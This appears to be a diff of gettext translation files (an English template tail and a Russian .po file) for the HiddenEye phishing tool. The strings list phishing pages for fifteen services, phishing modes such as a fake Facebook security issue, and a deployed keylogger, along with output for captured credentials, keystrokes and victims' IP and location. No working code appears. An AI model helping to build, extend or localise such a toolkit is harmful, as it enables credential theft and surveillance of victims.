" .'========={3}/----=\\{1}=========>\n"
" /:========={3}/-----====\\{1}\n"
" |=========={3}|-----======|{1}==========>\n"
" \\:========={3}\\---======/{1}\n"
" \\=========={3}\\=====/{1}==========>\n"
" ````~~~~=======~~~~````\n"
"\n"
" {3}HIDDEN EYE {3}BY: DARKSEC TEAM\n"
" {0}THANKS FOR USING IT. HELP US TO MAKE IT MORE USEFUL\n"
" {3}https://github.com/DarkSecDevelopers/HiddenEye "
msgstr ""
"\n"
" {1}_....~~~~=====~~~~...._\n"
" .'========={3}/----=\\{1}=========>\n"
" /:========={3}/-----====\\{1}\n"
" |=========={3}|-----======|{1}==========>\n"
" \\:========={3}\\---======/{1}\n"
" \\=========={3}\\=====/{1}==========>\n"
" ````~~~~=======~~~~````\n"
"\n"
" {3}HIDDEN EYE {3}BY: DARKSEC TEAM\n"
" {0}THANKS FOR USING IT. HELP US TO MAKE IT MORE USEFUL\n"
" {3}https://github.com/DarkSecDevelopers/HiddenEye "
#: Actions.py:281
#, python-brace-format
msgid ""
"{0}[{1}*{0}]{1} Waiting for credentials//Keystrokes//Victim's device info. \n"
msgstr ""
"{0}[{1}*{0}]{1} Waiting for credentials//Keystrokes//Victim's device info. \n"
#: Actions.py:287
#, python-brace-format
msgid ""
" {0}[ CREDENTIALS FOUND ]{1}:\n"
" {0}{2}{1}"
msgstr ""
" {0}[ CREDENTIALS FOUND ]{1}:\n"
" {0}{2}{1}"
#: Actions.py:302
#, python-brace-format
msgid ""
" \n"
"{0}[ VICTIM IP BONUS ]{1}:\n"
" {0}{2}{1}"
msgstr ""
" \n"
"{0}[ VICTIM IP BONUS ]{1}:\n"
" {0}{2}{1}"
#: Actions.py:308
#, python-brace-format
msgid ""
" \n"
"{0}[ VICTIM INFO FOUND ]{1}:\n"
" {0}{2}{1}"
msgstr ""
" \n"
"{0}[ VICTIM INFO FOUND ]{1}:\n"
" {0}{2}{1}"
#: Actions.py:309
#, python-brace-format
msgid ""
" \n"
"{0}Longitude: {2} \n"
"Latitude: {3}{1}"
msgstr ""
" \n"
"{0}Longitude: {2} \n"
"Latitude: {3}{1}"
#: Actions.py:310
#, python-brace-format
msgid ""
" \n"
"{0}ISP: {2} \n"
"Country: {3}{1}"
msgstr ""
" \n"
"{0}ISP: {2} \n"
"Country: {3}{1}"
#: Actions.py:311
#, python-brace-format
msgid ""
" \n"
"{0}Region: {2} \n"
"City: {3}{1}"
msgstr ""
" \n"
"{0}Region: {2} \n"
"City: {3}{1}"
#: Actions.py:321
#, python-format, python-brace-format
msgid ""
" {0}[ GETTING PRESSED KEYS ]{1}:\n"
" {0}%s{1}"
msgstr ""
" {0}[ GETTING PRESSED KEYS ]{1}:\n"
" {0}%s{1}"
#: Checks.py:18
#, python-brace-format
msgid "{0}Successful connection!{1}"
msgstr "{0}Successful connection!{1}"
#: Checks.py:24
#, python-brace-format
msgid ""
"{1}\n"
" _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}\n"
" |__| | ] | ] | |__ |\\ | {0}|__ \\__/ |__{1}\n"
" | | | ]__| ]__| |__ | \\| {0}|__ || |__{1}\n"
"\n"
" {0}[{1}!{0}]{1} Network error. Verify your connection.\n"
"\n"
msgstr ""
"{1}\n"
" _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}\n"
" |__| | ] | ] | |__ |\\ | {0}|__ \\__/ |__{1}\n"
" | | | ]__| ]__| |__ | \\| {0}|__ || |__{1}\n"
"\n"
" {0}[{1}!{0}]{1} Network error. Verify your connection.\n"
"\n"
#: Checks.py:35
msgid "[*] Downloading Ngrok..."
msgstr "[*] Downloading Ngrok..."
#~ msgid "Victim Public IP: (.*?)\n"
#~ msgstr "Victim Public IP: (.*?)\n"

Binary file not shown.

View File

@ -0,0 +1,500 @@
msgid ""
msgstr ""
"Project-Id-Version: hiddeneye\n"
"POT-Creation-Date: 2018-11-19 19:35+0200\n"
"PO-Revision-Date: 2018-11-19 19:38+0200\n"
"Last-Translator: sTiKyt <stikyt@protonmail.com>\n"
"Language-Team: sTiKyt\n"
"Language: ru_RU\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Generator: Poedit 2.2\n"
"X-Poedit-Basepath: ../../../Defs\n"
"Plural-Forms: nplurals=3; plural=(n%10==1 && n%100!=11 ? 0 : n%10>=2 && n"
"%10<=4 && (n%100<12 || n%100>14) ? 1 : 2);\n"
"X-Poedit-SearchPath-0: .\n"
#: Actions.py:77
#, python-brace-format
msgid ""
"\n"
" {0}Please select any available server:{1}"
msgstr ""
"\n"
"{0}Пожалуйста выберите сервер из списка:{1}"
#: Actions.py:78
#, python-brace-format
msgid ""
"\n"
" {0}[{1}1{0}]{1} Ngrok\n"
" {0}[{1}2{0}]{1} Serveo"
msgstr ""
"\n"
" {0}[{1}1{0}]{1} Ngrok\n"
" {0}[{1}2{0}]{1} Serveo"
#: Actions.py:122
#, python-brace-format
msgid ""
"\n"
"\n"
"\n"
"{1}"
"<=============================================================================>\n"
" || "
"||\n"
" {1}|| ██ ██ ██ ██████ ██████ ███████ ███ ██ {3}███████ ██ ██ "
"███████ {1}||\n"
" {1}|| ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ {3}██ ██ ██ "
"██ {1}||\n"
" {1}|| ███████ ██ ██ ██ ██ ██ ███████ ██ ██ ██ {3}███████ ████ "
"███████ {1}||\n"
" {1}|| ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ {3}██ ██ "
"██ {1}||\n"
" {1}|| ██ ██ ██ ██████ ██████ ███████ ██ ███ {3}███████ ██ "
"███████ {1}||\n"
" || "
"||\n"
" -----------------------------------------------------------------------------\n"
" v{3}0{1}.{3}1{1}.{3}"
"0{1} BY:DARKSEC{2}\n"
" {0}[ NOW WITH LIVE VICTIM ATTACK INFORMATION ]\n"
" {0}A KEYLOGGER WILL BE DEPLOYED FOR YOU, TO CAPTURE EVERY "
"KEYSTROKE ]\n"
"<=============================================================================>\n"
" "
msgstr ""
"\n"
"\n"
"\n"
"{1}"
"<=============================================================================>\n"
" || "
"||\n"
" {1}|| ██ ██ ██ ██████ ██████ ███████ ███ ██ {3}███████ ██ ██ "
"███████ {1}||\n"
" {1}|| ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ {3}██ ██ ██ "
"██ {1}||\n"
" {1}|| ███████ ██ ██ ██ ██ ██ ███████ ██ ██ ██ {3}███████ ████ "
"███████ {1}||\n"
" {1}|| ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ {3}██ ██ "
"██ {1}||\n"
" {1}|| ██ ██ ██ ██████ ██████ ███████ ██ ███ {3}███████ ██ "
"███████ {1}||\n"
" || "
"||\n"
" -----------------------------------------------------------------------------\n"
" v{3}0{1}.{3}1{1}.{3}"
"0{1} От команды DARKSEC{2}\n"
" {0}[ ТЕПЕРЬ СО СБОРОМ ИНФОРМАЦИИ О ЖЕРТВЕ ]\n"
" {0}ДЛЯ ВАС БЫЛ ЗАПУЩЕН ПЕРЕХВАТЧИК ВВОДА , ЧТОБЫ НЕ ПРОПУСТИТЬ "
"НИОДНОЙ СТРОКИ ]\n"
"<=============================================================================>\n"
" "
#: Actions.py:145
msgid "[PHP INSTALLATION FOUND]"
msgstr "[УСТАНОВЛЕНЫЙ PHP ОБНАРУЖЕН]"
#: Actions.py:148
#, python-brace-format
msgid ""
" --{0}>{1} PHP NOT FOUND: \n"
" {0}*{1} Please install PHP and run me again.http://www.php.net/"
msgstr ""
" --{0}>{1} PHP НЕ ОБНАРУЖЕН: \n"
" {0}*{1} Пожалуйста установите PHP и перезапустите HiddenEye. http://www.php."
"net/"
#: Actions.py:153
#, python-brace-format
msgid "{0}[{1}*{0}]{1} HiddenEye is Opening. Please Wait...{2}%"
msgstr "{0}[{1}*{0}]{1} HiddenEye открывается. Пожалуйста подождите... {2}%"
#: Actions.py:157
#, python-brace-format
msgid ""
"\n"
"{2}[{1}!{2}]{1} Do you agree to use this tool for educational purposes only? "
"({2}y{1}/{0}n{1})\n"
"{2}HiddenEye >>> {1}"
msgstr ""
"\n"
"{2}[{1}!{2}]{1} Согласны ли вы использовать этот инструмент исключительно в "
"образовательных целях? (Выберите: {2}y = Да{1}/{0}n = Нет{1})"
#: Actions.py:159
#, python-brace-format
msgid ""
"\n"
"\n"
"[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR "
"EDUCATIONAL PURPOSE. GOOD BYE!{1} ]\n"
"\n"
msgstr ""
"\n"
"\n"
"[ {0} ВЫ НЕ АВТОРИЗОВАНЫ ДЛЯ ИСПОЛЬЗОВАНИЯ ЭТОГО ИНСТРУМЕНТА.ЕГО "
"ИСПОЛЬЗОВАНИЕ ДОПУСКАЕТСЯ ТОЛЬКО В ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЯХ. ДОСВИДАНИЯ![{1} ]\n"
"\n"
#: Actions.py:161
#, python-brace-format
msgid ""
"\n"
"SELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n"
"\n"
" {0}[{1}1{0}]{1} Facebook\n"
"\n"
" {0}[{1}2{0}]{1} Google\n"
"\n"
" {0}[{1}3{0}]{1} LinkedIn\n"
"\n"
" {0}[{1}4{0}]{1} GitHub\n"
"\n"
" {0}[{1}5{0}]{1} StackOverflow\n"
"\n"
" {0}[{1}6{0}]{1} WordPress\n"
"\n"
" {0}[{1}7{0}]{1} Twitter\n"
"\n"
" {0}[{1}8{0}]{1} Instagram\n"
"\n"
" {0}[{1}9{0}]{1} Snapchat\n"
"\n"
" {0}[{1}10{0}]{1} Yahoo\n"
"\n"
" {0}[{1}11{0}]{1} Twitch\n"
"\n"
" {0}[{1}12{0}]{1} Microsoft\n"
"\n"
" {0}[{1}13{0}]{1} Steam\n"
"\n"
" {0}[{1}14{0}]{1} VK\n"
"\n"
" {0}[{1}15{0}]{1} iCloud\n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"ВЫБЕРИТЕ МЕТОД АТАКИ ДЛЯ ВАШЕЙ ЖЕРТВЫ:\n"
"\n"
" {0}[{1}1{0}]{1} Facebook\n"
"\n"
" {0}[{1}2{0}]{1} Google\n"
"\n"
" {0}[{1}3{0}]{1} LinkedIn\n"
"\n"
" {0}[{1}4{0}]{1} GitHub\n"
"\n"
" {0}[{1}5{0}]{1} StackOverflow\n"
"\n"
" {0}[{1}6{0}]{1} WordPress\n"
"\n"
" {0}[{1}7{0}]{1} Twitter\n"
"\n"
" {0}[{1}8{0}]{1} Instagram\n"
"\n"
" {0}[{1}9{0}]{1} Snapchat\n"
"\n"
" {0}[{1}10{0}]{1} Yahoo\n"
"\n"
" {0}[{1}11{0}]{1} Twitch\n"
"\n"
" {0}[{1}12{0}]{1} Microsoft\n"
"\n"
" {0}[{1}13{0}]{1} Steam\n"
"\n"
" {0}[{1}14{0}]{1} VK\n"
"\n"
" {0}[{1}15{0}]{1} iCloud\n"
"\n"
"{0}HiddenEye >>> {1}"
#: Actions.py:164
#, python-brace-format
msgid ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/"
"login_with)\n"
"\n"
" {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n"
"\n"
" {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"Тип операции:\n"
"\n"
" {0}[{1}1{0}]{1} Обычная страница\n"
"\n"
" {0}[{1}2{0}]{1} Продвинутый фишинг-Метод опроса(Poll_mode/login_with)\n"
"\n"
" {0}[{1}3{0}]{1} Facebook фишинг- Фальшивая проблема "
"безопасности(security_mode) \n"
"\n"
" {0}[{1}4{0}]{1} Facebook фишинг-Инициалы Messenger'a (messenger_mode) \n"
"\n"
"{0}HiddenEye >>> {1}"
#: Actions.py:168
#, python-brace-format
msgid ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n"
"\n"
" {0}[{1}3{0}]{1} New Google Web\n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"Тип операции:\n"
"\n"
" {0}[{1}1{0}]{1} Обычная страница\n"
"\n"
" {0}[{1}2{0}]{1} Продвинутый фишинг(poll_mode/login_with)\n"
"\n"
" {0}[{1}3{0}]{1} Новый Google Web\n"
"\n"
"{0}HiddenEye >>> {1}"
#: Actions.py:192
#, python-brace-format
msgid ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to "
"original autoliker)\n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"Тип операции:\n"
"\n"
" {0}[{1}1{0}]{1} Обычная веб-страница Instagram\n"
"\n"
" {0}[{1}2{0}]{1} Instagram автолайкер (После подтверждения, ссылается на "
"оригинальный автолайкер)\n"
"\n"
"{0}HiddenEye >>> {1}"
#: Actions.py:216
#, python-brace-format
msgid ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Обычная веб-страница VK\n"
"\n"
" {0}[{1}2{0}]{1} Продвинутый фишинг(poll_mode/login_with)\n"
"\n"
"{0}HiddenEye >>> {1}"
#: Actions.py:226
#, python-brace-format
msgid ""
" {0}\n"
" [{1}*{0}] module loaded. Building site...{0}"
msgstr ""
" {0}\n"
" [{1}*{0}] модуль загружен. Построение сайта...{0}"
#: Actions.py:230
msgid ""
"\n"
" (Choose Wisely As Your Victim Will Redirect to This Link)"
msgstr ""
"\n"
" (Выбирайте с умом, ваша жертва будет перенаправлена по этому адресу)"
#: Actions.py:231
msgid ""
"\n"
" (Leave Blank To Loop The Phishing Page)"
msgstr ""
"\n"
" (Оставьте пустым чтобы зациклить страницу)"
#: Actions.py:232
#, python-brace-format
msgid ""
"\n"
" {0}Insert a custom redirect url:"
msgstr ""
"\n"
" {0}Введите альтернативный адрес переадресации:"
#: Actions.py:233
#, python-brace-format
msgid ""
"\n"
" {0}CUSTOM URL>>> {1}"
msgstr ""
"\n"
" {0}АЛЬТЕРНАТИВНЫЙ АДРЕС >>> {1}"
#: Actions.py:264
#, python-brace-format
msgid ""
"\n"
" {1}_....~~~~=====~~~~...._\n"
" .'========={3}/----=\\{1}=========>\n"
" /:========={3}/-----====\\{1}\n"
" |=========={3}|-----======|{1}==========>\n"
" \\:========={3}\\---======/{1}\n"
" \\=========={3}\\=====/{1}==========>\n"
" ````~~~~=======~~~~````\n"
"\n"
" {3}HIDDEN EYE {3}BY: DARKSEC TEAM\n"
" {0}THANKS FOR USING IT. HELP US TO MAKE IT MORE USEFUL\n"
" {3}https://github.com/DarkSecDevelopers/HiddenEye "
msgstr ""
"\n"
" {1}_....~~~~=====~~~~...._\n"
" .'========={3}/----=\\{1}=========>\n"
" /:========={3}/-----====\\{1}\n"
" |=========={3}|-----======|{1}==========>\n"
" \\:========={3}\\---======/{1}\n"
" \\=========={3}\\=====/{1}==========>\n"
" ````~~~~=======~~~~````\n"
"\n"
" {3}HIDDEN EYE {3}ОТ КОМАНДЫ DARKSEC \n"
" {0}СПАСИБО ЧТО ОСТАЕТЕСЬ С НАМИ. ПОМОГИТЕ НАМ СДЕЛАТЬ ПРИЛОЖЕНИЕ "
"ПОЛЕЗНЕЕ\n"
" {3}https://github.com/DarkSecDevelopers/HiddenEye "
#: Actions.py:281
#, python-brace-format
msgid ""
"{0}[{1}*{0}]{1} Waiting for credentials//Keystrokes//Victim's device info. \n"
msgstr ""
"{0}[{1}*{0}]{1} Ожидание базовой информации//нажатий клавиш//информации об "
"устройстве жертвы. \n"
#: Actions.py:287
#, python-brace-format
msgid ""
" {0}[ CREDENTIALS FOUND ]{1}:\n"
" {0}{2}{1}"
msgstr ""
" {0}[ ИНФОРМАЦИЯ ОБНАРУЖЕНА ]{1}:\n"
" {0}{2}{1}"
#: Actions.py:302
#, python-brace-format
msgid ""
" \n"
"{0}[ VICTIM IP BONUS ]{1}:\n"
" {0}{2}{1}"
msgstr ""
" \n"
"{0}[ Дополнительный IP жертвы ]{1}:\n"
" {0}{2}{1}"
#: Actions.py:308
#, python-brace-format
msgid ""
" \n"
"{0}[ VICTIM INFO FOUND ]{1}:\n"
" {0}{2}{1}"
msgstr ""
" \n"
"{0}[ КООРДИНАТЫ ЖЕРТВЫ ОБНАРУЖЕНЫ ]{1}:\n"
" {0}{2}{1}"
#: Actions.py:309
#, python-brace-format
msgid ""
" \n"
"{0}Longitude: {2} \n"
"Latitude: {3}{1}"
msgstr ""
" \n"
"{0}Долгота: {2} \n"
"Широта: {3}{1}"
#: Actions.py:310
#, python-brace-format
msgid ""
" \n"
"{0}ISP: {2} \n"
"Country: {3}{1}"
msgstr ""
" \n"
"{0}Интернет провайдер: {2} \n"
"Страна: {3}{1}"
#: Actions.py:311
#, python-brace-format
msgid ""
" \n"
"{0}Region: {2} \n"
"City: {3}{1}"
msgstr ""
" \n"
"{0}Регион: {2} \n"
"Город: {3}{1}"
#: Actions.py:321
#, python-format, python-brace-format
msgid ""
" {0}[ GETTING PRESSED KEYS ]{1}:\n"
" {0}%s{1}"
msgstr ""
" {0}[ ПОЛУЧЕНИЕ НАЖАТЫХ КЛАВИШ ]{1}:\n"
" {0}%s{1}"
#: Checks.py:18
#, python-brace-format
msgid "{0}Successful connection!{1}"
msgstr "{0}Успешное соединение!{1}"
#: Checks.py:24
#, python-brace-format
msgid ""
"{1}\n"
" _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}\n"
" |__| | ] | ] | |__ |\\ | {0}|__ \\__/ |__{1}\n"
" | | | ]__| ]__| |__ | \\| {0}|__ || |__{1}\n"
"\n"
" {0}[{1}!{0}]{1} Network error. Verify your connection.\n"
"\n"
msgstr ""
"{1}\n"
" _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}\n"
" |__| | ] | ] | |__ |\\ | {0}|__ \\__/ |__{1}\n"
" | | | ]__| ]__| |__ | \\| {0}|__ || |__{1}\n"
"\n"
" {0}[{1}!{0}]{1} Сетевая ошибка. Проверьте ваше "
"подключение.\n"
"\n"
#: Checks.py:35
msgid "[*] Downloading Ngrok..."
msgstr "[*] Загрузка Ngrok..."
#~ msgid "Victim Public IP: (.*?)\n"
#~ msgstr "Публичный IP жертвы: (.*?)\n"